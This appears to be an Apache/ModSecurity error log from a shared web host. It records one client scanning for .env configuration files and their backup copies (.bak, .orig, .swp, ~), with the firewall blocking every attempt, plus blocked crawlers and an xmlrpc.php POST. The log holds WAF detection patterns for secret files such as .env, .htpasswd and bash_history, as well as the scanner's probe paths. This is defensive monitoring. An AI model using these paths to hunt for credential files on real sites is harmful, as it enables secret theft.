[Tue May 26 14:19:58.331631 2026] [core:error] [pid 606909:tid 607162] [client 5.255.121.146:33938] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:19:58.331647 2026] [core:error] [pid 606909:tid 607162] [client 5.255.121.146:33938] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:19:58.336034 2026] [core:error] [pid 606909:tid 607102] [client 5.255.121.146:34132] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:19:58.336046 2026] [core:error] [pid 606909:tid 607102] [client 5.255.121.146:34132] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:19:58.336085 2026] [core:error] [pid 606909:tid 607100] [client 5.255.121.146:34154] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:19:58.336095 2026] [core:error] [pid 606909:tid 607100] [client 5.255.121.146:34154] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:19:58.336436 2026] [core:error] [pid 606909:tid 607113] [client 5.255.121.146:34068] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:19:58.336450 2026] [core:error] [pid 606909:tid 607113] [client 5.255.121.146:34068] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:19:58.355275 2026] [core:error] [pid 606909:tid 607132] [client 5.255.121.146:34032] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:19:58.355413 2026] [core:error] [pid 606909:tid 607132] [client 5.255.121.146:34032] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:19:58.356809 2026] [core:error] [pid 606909:tid 607119] [client 5.255.121.146:34164] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:19:58.356966 2026] [core:error] [pid 606909:tid 607119] [client 5.255.121.146:34164] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:19:58.357372 2026] [core:error] [pid 606909:tid 607107] [client 5.255.121.146:34130] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:19:58.357383 2026] [core:error] [pid 606909:tid 607107] [client 5.255.121.146:34130] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:19:58.358283 2026] [core:error] [pid 606909:tid 607137] [client 5.255.121.146:34046] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:19:58.358431 2026] [core:error] [pid 606909:tid 607137] [client 5.255.121.146:34046] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:19:58.358728 2026] [core:error] [pid 606909:tid 607135] [client 5.255.121.146:34018] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:19:58.358728 2026] [core:error] [pid 606909:tid 607118] [client 5.255.121.146:34128] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:19:58.358873 2026] [core:error] [pid 606909:tid 607135] [client 5.255.121.146:34018] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:19:58.358882 2026] [core:error] [pid 606909:tid 607118] [client 5.255.121.146:34128] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:19:58.359664 2026] [core:error] [pid 606909:tid 607108] [client 5.255.121.146:34064] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:19:58.359676 2026] [core:error] [pid 606909:tid 607108] [client 5.255.121.146:34064] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:19:58.359219 2026] [core:error] [pid 606909:tid 607133] [client 5.255.121.146:34138] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:19:58.359703 2026] [core:error] [pid 606909:tid 607133] [client 5.255.121.146:34138] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:19:58.359763 2026] [core:error] [pid 606909:tid 607138] [client 5.255.121.146:34112] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:19:58.359799 2026] [core:error] [pid 606909:tid 607138] [client 5.255.121.146:34112] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:19:58.364238 2026] [core:error] [pid 606909:tid 607127] [client 5.255.121.146:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:19:58.364315 2026] [core:error] [pid 606909:tid 607127] [client 5.255.121.146:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:19:58.364705 2026] [core:error] [pid 606909:tid 607088] [client 5.255.121.146:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:19:58.364734 2026] [core:error] [pid 606909:tid 607088] [client 5.255.121.146:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:19:58.369660 2026] [core:error] [pid 606909:tid 607128] [client 5.255.121.146:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:19:58.369674 2026] [core:error] [pid 606909:tid 607128] [client 5.255.121.146:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:19:58.398932 2026] [security2:error] [pid 606909:tid 607080] [client 5.255.121.146:33966] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpcalendars.shahvishaal.com"] [uri "/___proxy_subdomain_cpcalendars/app/.env"] [unique_id "ahVetl0yRtX9qA7aVUVH8AAAAK4"]
[Tue May 26 14:19:58.573825 2026] [security2:error] [pid 606909:tid 607147] [client 57.141.2.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVetl0yRtX9qA7aVUVHyQAAAPE"]
[Tue May 26 14:19:58.596849 2026] [security2:error] [pid 606909:tid 607129] [client 5.255.121.146:33946] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpcalendars.shahvishaal.com"] [uri "/___proxy_subdomain_cpcalendars/.env"] [unique_id "ahVetl0yRtX9qA7aVUVH9AAAAN8"]
[Tue May 26 14:19:58.787031 2026] [core:error] [pid 606909:tid 607097] [client 5.255.121.146:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:19:58.787048 2026] [core:error] [pid 606909:tid 607097] [client 5.255.121.146:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:19:59.184039 2026] [security2:error] [pid 606909:tid 607105] [client 5.255.121.146:33966] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "cpcalendars.shahvishaal.com"] [uri "/___proxy_subdomain_cpcalendars/.env.production.copy"] [unique_id "ahVet10yRtX9qA7aVUVIDQAAAMc"]
[Tue May 26 14:19:59.188093 2026] [security2:error] [pid 606909:tid 607057] [client 185.191.171.10:48686] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/tag/july-21-25/list/"] [unique_id "ahVet10yRtX9qA7aVUVIEQAAAJc"]
[Tue May 26 14:19:59.188176 2026] [security2:error] [pid 606909:tid 607057] [client 185.191.171.10:48686] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/tag/july-21-25/list/"] [unique_id "ahVet10yRtX9qA7aVUVIEQAAAJc"]
[Tue May 26 14:19:59.191663 2026] [core:error] [pid 606909:tid 607102] [client 5.255.121.146:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:19:59.191676 2026] [core:error] [pid 606909:tid 607102] [client 5.255.121.146:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:19:59.196480 2026] [core:error] [pid 606909:tid 607163] [client 5.255.121.146:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:19:59.196502 2026] [core:error] [pid 606909:tid 607163] [client 5.255.121.146:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:19:59.399285 2026] [security2:error] [pid 606909:tid 607055] [client 202.141.30.10:65418] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 10.30.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVet10yRtX9qA7aVUVIFwAAAJU"]
[Tue May 26 14:19:59.399481 2026] [security2:error] [pid 606909:tid 607055] [client 202.141.30.10:65418] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVet10yRtX9qA7aVUVIFwAAAJU"]
[Tue May 26 14:19:59.503361 2026] [core:error] [pid 606909:tid 607050] [client 5.255.121.146:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:19:59.503378 2026] [core:error] [pid 606909:tid 607050] [client 5.255.121.146:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:19:59.830940 2026] [security2:error] [pid 606909:tid 607153] [client 5.255.121.146:34460] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "cpcalendars.shahvishaal.com"] [uri "/___proxy_subdomain_cpcalendars/.env.production.bak"] [unique_id "ahVet10yRtX9qA7aVUVIKQAAAPc"]
[Tue May 26 14:19:59.835468 2026] [security2:error] [pid 606909:tid 607045] [client 5.255.121.146:34404] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "cpcalendars.shahvishaal.com"] [uri "/___proxy_subdomain_cpcalendars/.env.production.backup"] [unique_id "ahVet10yRtX9qA7aVUVILAAAAIs"]
[Tue May 26 14:19:59.835809 2026] [security2:error] [pid 606909:tid 607143] [client 5.255.121.146:34390] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "cpcalendars.shahvishaal.com"] [uri "/___proxy_subdomain_cpcalendars/.env.local.copy"] [unique_id "ahVet10yRtX9qA7aVUVILgAAAO0"]
[Tue May 26 14:19:59.835867 2026] [security2:error] [pid 606909:tid 607166] [client 5.255.121.146:34378] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "cpcalendars.shahvishaal.com"] [uri "/___proxy_subdomain_cpcalendars/.env.local.orig"] [unique_id "ahVet10yRtX9qA7aVUVILQAAAQQ"]
[Tue May 26 14:19:59.836121 2026] [security2:error] [pid 606909:tid 607062] [client 5.255.121.146:34366] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "cpcalendars.shahvishaal.com"] [uri "/___proxy_subdomain_cpcalendars/.env.local~"] [unique_id "ahVet10yRtX9qA7aVUVILwAAAJw"]
[Tue May 26 14:19:59.836667 2026] [security2:error] [pid 606909:tid 607147] [client 5.255.121.146:34252] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "cpcalendars.shahvishaal.com"] [uri "/___proxy_subdomain_cpcalendars/.env.bak"] [unique_id "ahVet10yRtX9qA7aVUVIMAAAAPE"]
[Tue May 26 14:19:59.845753 2026] [core:error] [pid 606909:tid 607101] [client 5.255.121.146:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:19:59.845771 2026] [core:error] [pid 606909:tid 607101] [client 5.255.121.146:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:19:59.846805 2026] [core:error] [pid 606909:tid 607059] [client 5.255.121.146:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:19:59.846819 2026] [core:error] [pid 606909:tid 607059] [client 5.255.121.146:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:19:59.847155 2026] [core:error] [pid 606909:tid 607109] [client 5.255.121.146:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:19:59.847170 2026] [core:error] [pid 606909:tid 607109] [client 5.255.121.146:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:19:59.847556 2026] [core:error] [pid 606909:tid 607043] [client 5.255.121.146:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:19:59.847572 2026] [core:error] [pid 606909:tid 607043] [client 5.255.121.146:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:19:59.853650 2026] [security2:error] [pid 606909:tid 607084] [client 5.255.121.146:34296] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "cpcalendars.shahvishaal.com"] [uri "/___proxy_subdomain_cpcalendars/.env~"] [unique_id "ahVet10yRtX9qA7aVUVIOwAAALI"]
[Tue May 26 14:19:59.854191 2026] [security2:error] [pid 606909:tid 607144] [client 5.255.121.146:34340] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "cpcalendars.shahvishaal.com"] [uri "/___proxy_subdomain_cpcalendars/.env.local.backup"] [unique_id "ahVet10yRtX9qA7aVUVIPAAAAO4"]
[Tue May 26 14:19:59.854641 2026] [security2:error] [pid 606909:tid 607115] [client 5.255.121.146:34302] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "cpcalendars.shahvishaal.com"] [uri "/___proxy_subdomain_cpcalendars/.env.orig"] [unique_id "ahVet10yRtX9qA7aVUVIPQAAANE"]
[Tue May 26 14:19:59.855596 2026] [security2:error] [pid 606909:tid 607120] [client 5.255.121.146:34442] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "cpcalendars.shahvishaal.com"] [uri "/___proxy_subdomain_cpcalendars/.env.production.swp"] [unique_id "ahVet10yRtX9qA7aVUVIPgAAANY"]
[Tue May 26 14:19:59.855666 2026] [security2:error] [pid 606909:tid 607154] [client 5.255.121.146:34428] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "cpcalendars.shahvishaal.com"] [uri "/___proxy_subdomain_cpcalendars/.env.production~"] [unique_id "ahVet10yRtX9qA7aVUVIQAAAAPg"]
[Tue May 26 14:19:59.857885 2026] [security2:error] [pid 606909:tid 607128] [client 5.255.121.146:34312] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "cpcalendars.shahvishaal.com"] [uri "/___proxy_subdomain_cpcalendars/.env.local.bak"] [unique_id "ahVet10yRtX9qA7aVUVIQQAAAN4"]
[Tue May 26 14:19:59.865113 2026] [security2:error] [pid 606909:tid 607161] [client 5.255.121.146:34398] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "cpcalendars.shahvishaal.com"] [uri "/___proxy_subdomain_cpcalendars/.env.production.old"] [unique_id "ahVet10yRtX9qA7aVUVIRAAAAP8"]
[Tue May 26 14:19:59.866086 2026] [security2:error] [pid 606909:tid 607152] [client 5.255.121.146:34372] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "cpcalendars.shahvishaal.com"] [uri "/___proxy_subdomain_cpcalendars/.env.local.swp"] [unique_id "ahVet10yRtX9qA7aVUVIRgAAAPY"]
[Tue May 26 14:19:59.866536 2026] [security2:error] [pid 606909:tid 607157] [client 5.255.121.146:34298] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "cpcalendars.shahvishaal.com"] [uri "/___proxy_subdomain_cpcalendars/.env.swp"] [unique_id "ahVet10yRtX9qA7aVUVIRwAAAPs"]
[Tue May 26 14:19:59.866558 2026] [security2:error] [pid 606909:tid 607096] [client 5.255.121.146:34444] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "cpcalendars.shahvishaal.com"] [uri "/___proxy_subdomain_cpcalendars/.env.production.orig"] [unique_id "ahVet10yRtX9qA7aVUVISAAAAL4"]
[Tue May 26 14:19:59.867020 2026] [security2:error] [pid 606909:tid 607129] [client 5.255.121.146:34310] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "cpcalendars.shahvishaal.com"] [uri "/___proxy_subdomain_cpcalendars/.env.copy"] [unique_id "ahVet10yRtX9qA7aVUVIRQAAAN8"]
[Tue May 26 14:19:59.867896 2026] [core:error] [pid 606909:tid 607083] [client 5.255.121.146:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:19:59.867906 2026] [core:error] [pid 606909:tid 607083] [client 5.255.121.146:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:19:59.868799 2026] [security2:error] [pid 606909:tid 607068] [client 5.255.121.146:34238] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "cpcalendars.shahvishaal.com"] [uri "/___proxy_subdomain_cpcalendars/.env.old"] [unique_id "ahVet10yRtX9qA7aVUVISgAAAKI"]
